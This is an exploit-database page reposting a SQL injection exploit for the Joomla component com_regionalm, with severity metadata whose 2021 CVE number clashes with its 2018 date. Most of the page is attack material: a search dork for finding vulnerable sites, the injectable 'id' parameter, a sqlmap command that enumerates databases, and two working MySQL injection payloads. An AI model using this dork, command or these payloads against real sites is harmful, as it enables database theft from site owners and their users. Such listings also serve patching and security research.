Advertisement






Joomla! Com_regionalm SQL Injection

CVE Category Price Severity
CVE-2021-23635 CWE-89 $5000 High
Author Risk Exploitation Type Date
Unknown High Remote 2018-12-17
CPE
cpe:cpe:/a:joomla:regionalm
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018120159

Below is a copy:

Joomla! Com_regionalm SQL Injection
Author : Security007
Tested on : ubuntu 18.04
Vendor Homepage : http://www.joomla.org
Dork : inurl:index.php?option=com_regionalm
Parameter : id (GET)
Injection point : http://localhost/index.php?option=com_regionalm&task=regionalmuseum&id=12[ Inject Here ]&Itemid=139&lang=en

Proof Of Concept:
sqlmap -u "http://localhost/index.php?option=com_regionalm&task=regionalmuseum&id=12&Itemid=139&lang=en " --risk=3 --level=5 --random-agent --dbs -p id

Parameter: id (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (DUAL)
Payload: option=com_regionalm&task=regionalmuseum&id=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)

Type: error-based
Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
Payload: option=com_regionalm&task=regionalmuseum&id=(SELECT 6600 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum